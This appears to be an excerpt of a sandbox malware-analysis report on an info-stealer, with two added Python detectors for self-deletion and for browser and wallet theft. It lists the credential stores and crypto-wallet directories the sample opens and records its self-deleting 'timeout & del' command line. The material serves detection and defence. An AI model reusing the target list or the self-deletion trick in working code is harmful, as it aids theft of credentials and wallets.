Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_0043C04C mov eax, dword ptr fs:[00000030h] 0_2_0043C04C
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_00415E60 mov eax, dword ptr fs:[00000030h] 0_2_00415E60
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_00401000 mov eax, dword ptr fs:[00000030h] 0_2_00401000
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_0043C0B2 mov eax, dword ptr fs:[00000030h] 0_2_0043C0B2
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_00406040 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetSetOptionA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle, 0_2_00406040
Source: C:\Users\user\Desktop\m0wsoI3.exe Memory protected: page guard
Source: C:\Users\user\Desktop\m0wsoI3.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\m0wsoI3.exe" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: GetProcessHeap,RtlAllocateHeap,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,memset,LocalFree, 0_2_0040CF60
Source: C:\Users\user\Desktop\m0wsoI3.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\m0wsoI3.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_0040CE40 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA, 0_2_0040CE40
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_0040CE00 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 0_2_0040CE00
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_0040CEA0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA, 0_2_0040CEA0
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_004084E0 GetVersionExA,LoadLibraryA,WideCharToMultiByte,lstrlen,WideCharToMultiByte,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,WideCharToMultiByte,lstrcat,lstrcat,lstrcat,WideCharToMultiByte,lstrcat,lstrcat,lstrcat,lstrcat,WideCharToMultiByte,lstrcat,FreeLibrary, 0_2_004084E0
Source: C:\Users\user\Desktop\m0wsoI3.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
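The process chain recorded above (m0wsoI3.exe spawning cmd.exe with "/c timeout /t 5 & del /f /q <own path> & exit", which in turn spawns timeout.exe) is the self-deletion the report flags. The following is an added example, not part of the Joe Sandbox report or of the sample: detection logic that walks process-creation events and fires only when the path handed to "del" is the parent process's own image. The event records are constructed for the example; the PID 7292 is the sample's PID from this report, every other PID, the parent of the sample and the benign installer events are assumptions.

```python
import re

# Constructed process-creation events (not the report's raw data). 7292 is the
# sample's PID in the report; all other PIDs and the installer events are made up.
EVENTS = [
    {"pid": 7292, "ppid": 4100,
     "image": r"C:\Users\user\Desktop\m0wsoI3.exe",
     "cmdline": r'"C:\Users\user\Desktop\m0wsoI3.exe"'},
    {"pid": 7800, "ppid": 7292,
     "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\m0wsoI3.exe" & exit'},
    {"pid": 7950, "ppid": 7800,
     "image": r"C:\Windows\SysWOW64\timeout.exe",
     "cmdline": "timeout /t 5"},
    # Benign look-alike: an installer deleting its log file, not its own image.
    {"pid": 8100, "ppid": 4100,
     "image": r"C:\Users\user\AppData\Local\Temp\setup_x86.exe",
     "cmdline": r'"C:\Users\user\AppData\Local\Temp\setup_x86.exe" /S'},
    {"pid": 8120, "ppid": 8100,
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c del /f /q "C:\Users\user\AppData\Local\Temp\setup.log"'},
]

# "del"/"erase" at the start of a command (after /c, /k, & or |), optional
# switches, then a quoted or bare path running up to the next separator.
DEL_RE = re.compile(
    r'(?:^|[&|]\s*|/[ck]\s+)(?:del|erase)\b(?:\s+/[a-z])*\s+"?(?P<target>[^"&|]+?)"?\s*(?:&|\||$)',
    re.IGNORECASE,
)
# Delays used to let the parent exit so its image is no longer locked.
DELAY_RE = re.compile(
    r'\b(?:timeout(?:\.exe)?\s+(?:/t\s+)?\d+|ping\b[^&|]*-n\s+\d+|sleep\s+\d+)',
    re.IGNORECASE,
)


def parse_del_target(cmdline):
    """Return the path a cmd.exe command line deletes, or None if it deletes nothing."""
    m = DEL_RE.search(cmdline)
    return m.group("target").strip() if m else None


def find_self_deletion(events):
    """Flag cmd.exe children whose 'del' target equals the parent's own image path."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        # Match on the loaded image, not argv[0]: under WoW64 the command line
        # says System32\cmd.exe while the image that ran is SysWOW64\cmd.exe.
        if not e["image"].lower().endswith("\\cmd.exe"):
            continue
        target = parse_del_target(e["cmdline"])
        parent = by_pid.get(e["ppid"])
        if target is None or parent is None:
            continue
        if target.lower() == parent["image"].lower():
            findings.append({
                "cmd_pid": e["pid"],
                "deleted_image": parent["image"],
                "delayed": DELAY_RE.search(e["cmdline"]) is not None,
            })
    return findings


if __name__ == "__main__":
    for f in find_self_deletion(EVENTS):
        print(f"self-deletion: cmd.exe pid {f['cmd_pid']} removes "
              f"{f['deleted_image']} (delayed={f['delayed']})")
```

Keying the rule on "target equals parent image" rather than on "timeout & del" alone is what keeps installers and updaters, which routinely delete their own temp files, out of the alert queue; the delay is recorded as a secondary indicator only.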

Stealing of Sensitive Information

Source: Yara match File source: m0wsoI3.exe, type: SAMPLE
Source: Yara match File source: 0.0.m0wsoI3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.m0wsoI3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1233026498.000000000043C000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1299941193.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1300112411.000000000043C000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 0.2.m0wsoI3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1299941193.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 0.2.m0wsoI3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1299941193.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1300238771.00000000004CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: m0wsoI3.exe PID: 7292, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: m0wsoI3.exe, 00000000.00000002.1300238771.00000000004CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Electrum-LTC\wallets\
Source: m0wsoI3.exe, 00000000.00000002.1300238771.000000000051D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\ElectronCash\wallets\s
Source: m0wsoI3.exe, 00000000.00000002.1300238771.00000000004CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Electrum\wallets\
Source: m0wsoI3.exe, 00000000.00000002.1300238771.00000000004CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: m0wsoI3.exe, 00000000.00000002.1300238771.00000000004CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \jaxx\Local Storage\
Source: m0wsoI3.exe, 00000000.00000002.1300238771.00000000004CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: exodus.conf.json
Source: m0wsoI3.exe, 00000000.00000002.1300238771.00000000004CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Exodus\exodus.wallet\
Source: m0wsoI3.exe, 00000000.00000002.1300238771.00000000004CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: info.seco
Source: m0wsoI3.exe, 00000000.00000002.1300238771.00000000004CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ElectrumLTC
Source: m0wsoI3.exe, 00000000.00000002.1300238771.00000000004CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \jaxx\Local Storage\
Source: m0wsoI3.exe, 00000000.00000002.1300238771.00000000004CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: passphrase.json
Source: m0wsoI3.exe, 00000000.00000002.1300238771.000000000051D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\\keystore*@
Source: m0wsoI3.exe, 00000000.00000002.1300238771.00000000004CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Exodus\exodus.wallet\
Source: m0wsoI3.exe, 00000000.00000002.1300238771.000000000051D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\\keystore*@
Source: m0wsoI3.exe, 00000000.00000002.1300238771.00000000004CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: file__0.localstorage
Source: m0wsoI3.exe, 00000000.00000002.1300238771.00000000004CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: default_wallet
Source: m0wsoI3.exe, 00000000.00000002.1300238771.00000000004CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: m0wsoI3.exe, 00000000.00000002.1300238771.00000000004CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Exodus\exodus.wallet\
Source: m0wsoI3.exe, 00000000.00000002.1300238771.00000000004CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: multidoge.wallet
Source: m0wsoI3.exe, 00000000.00000002.1300238771.00000000004CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: seed.seco
Source: m0wsoI3.exe, 00000000.00000002.1300238771.000000000051D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\\keystore*@
Source: m0wsoI3.exe, 00000000.00000002.1300238771.00000000004CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Electrum-LTC\wallets\
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\Desktop\m0wsoI3.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: Yara match File source: 00000000.00000002.1300238771.00000000004CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: m0wsoI3.exe PID: 7292, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
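The file opens listed under this signature are the browser credential stores (Chrome and Edge "Login Data", "Network\Cookies", "Web Data" and "History"; Firefox "places.sqlite" and "cookies.sqlite" together with their -wal and -shm sidecar files) and the wallet directories the sample enumerates. The following is an added example, not part of the Joe Sandbox report or of the sample: a classifier that turns a per-process file-access list like this one into a verdict. The path patterns are built only from paths that appear on this page; the set of stores counted as credential material, the profile-name wildcard and the "two browser families, or one browser plus a wallet" threshold are the example's own choices. The sample input reuses the report's paths verbatim.

```python
import re
from collections import defaultdict

# Sample input: the file-open paths exactly as they appear in this report
# (sandbox user "user", Firefox profile "2o7hffxt.default-release"). The first
# entry is one of the Chrome extension folders the sample also opened.
SAMPLE_PATHS = [p.strip() for p in r"""
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
C:\Users\user\AppData\Roaming\Electrum\wallets\
C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
C:\Users\user\AppData\Roaming\ElectronCash\wallets\
C:\Users\user\AppData\Roaming\MultiDoge\
C:\Users\user\AppData\Roaming\jaxx\Local Storage\
C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
C:\Users\user\AppData\Roaming\Binance\
C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
""".splitlines() if p.strip()]

# Chromium-family stores. Any profile folder ("Default", "Profile 1", ...) is
# accepted; newer Chrome keeps Cookies under the Network\ subfolder.
CHROMIUM_RE = re.compile(
    r"\\(?P<vendor>Google\\Chrome|Microsoft\\Edge)\\User Data\\[^\\]+\\"
    r"(?:Network\\)?(?P<store>Login Data|Cookies|Web Data|History)$",
    re.IGNORECASE,
)
# Firefox stores; -wal/-shm are SQLite write-ahead-log and shared-memory
# sidecars, reported as the base database they belong to.
FIREFOX_RE = re.compile(
    r"\\Mozilla\\Firefox\\Profiles\\[^\\]+\\"
    r"(?P<store>(?:places|cookies|formhistory)\.sqlite|logins\.json|key4\.db)(?:-wal|-shm)?$",
    re.IGNORECASE,
)
# Wallet directories seen in this report; matched as a whole path component.
WALLET_RE = re.compile(
    r"\\(?P<wallet>Electrum-LTC|Electrum|ElectronCash|Exodus|jaxx|atomic|MultiDoge|Binance|Coinomi)(?:\\|$)",
    re.IGNORECASE,
)
# Stores that hold credentials or session material rather than plain history.
CREDENTIAL_STORES = {"Login Data", "Cookies", "Web Data",
                     "cookies.sqlite", "logins.json", "key4.db"}


def classify(path):
    """Return (kind, owner, store) with kind in {'browser', 'wallet', 'other'}."""
    m = CHROMIUM_RE.search(path)
    if m:
        return ("browser", m.group("vendor").split("\\")[-1].lower(), m.group("store"))
    m = FIREFOX_RE.search(path)
    if m:
        return ("browser", "firefox", m.group("store").lower())
    m = WALLET_RE.search(path)
    if m:
        return ("wallet", m.group("wallet"), None)
    return ("other", None, None)


def summarize(paths):
    """Aggregate one process's file accesses into a stealer verdict."""
    browsers = defaultdict(set)
    wallets = set()
    other = 0
    for p in paths:
        kind, owner, store = classify(p)
        if kind == "browser":
            browsers[owner].add(store)
        elif kind == "wallet":
            wallets.add(owner)
        else:
            other += 1
    with_creds = {b for b, stores in browsers.items() if stores & CREDENTIAL_STORES}
    # A browser reading its own profile is normal. One process reading the
    # credential stores of two browser families, or a browser store plus
    # wallet directories, is the pattern this report shows.
    verdict = len(with_creds) >= 2 or (len(with_creds) >= 1 and len(wallets) >= 1)
    return {
        "browsers": {b: sorted(s) for b, s in browsers.items()},
        "wallets": sorted(wallets, key=str.lower),
        "other": other,
        "stealer_pattern": verdict,
    }


if __name__ == "__main__":
    print(summarize(SAMPLE_PATHS))
```

Two details worth carrying into a real rule: the -wal sidecar is where rows committed since the last checkpoint live, so a collector that copies only places.sqlite or cookies.sqlite misses the freshest entries, which is why the sample opens both; and since Chrome keeps these databases locked while it runs, a process copying them elsewhere before reading (the FindFirstFileA/CopyFileA/DeleteFileA loops listed earlier in this report fit that shape) is itself a signal, so pair this classifier with the file-copy events rather than with opens alone.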

Remote Access Functionality

Source: Yara match File source: m0wsoI3.exe, type: SAMPLE
Source: Yara match File source: 0.0.m0wsoI3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.m0wsoI3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1233026498.000000000043C000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1299941193.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1300112411.000000000043C000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 0.2.m0wsoI3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1299941193.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 0.2.m0wsoI3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1299941193.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1300238771.00000000004CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: m0wsoI3.exe PID: 7292, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_6090C1D6 sqlite3_clear_bindings, 0_2_6090C1D6
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_609254B1 sqlite3_bind_zeroblob, 0_2_609254B1
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_6090F435 sqlite3_bind_parameter_index, 0_2_6090F435
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_609255D4 sqlite3_bind_text16, 0_2_609255D4
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_609255FF sqlite3_bind_text, 0_2_609255FF
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_60925686 sqlite3_bind_int64, 0_2_60925686
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_609256E5 sqlite3_bind_int, 0_2_609256E5
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_6092562A sqlite3_bind_blob, 0_2_6092562A
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_60925655 sqlite3_bind_null, 0_2_60925655
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_6092570B sqlite3_bind_double, 0_2_6092570B
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_60925778 sqlite3_bind_value, 0_2_60925778
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_6090577D sqlite3_bind_parameter_name, 0_2_6090577D
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_6090576B sqlite3_bind_parameter_count, 0_2_6090576B
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_6090EAE5 sqlite3_transfer_bindings, 0_2_6090EAE5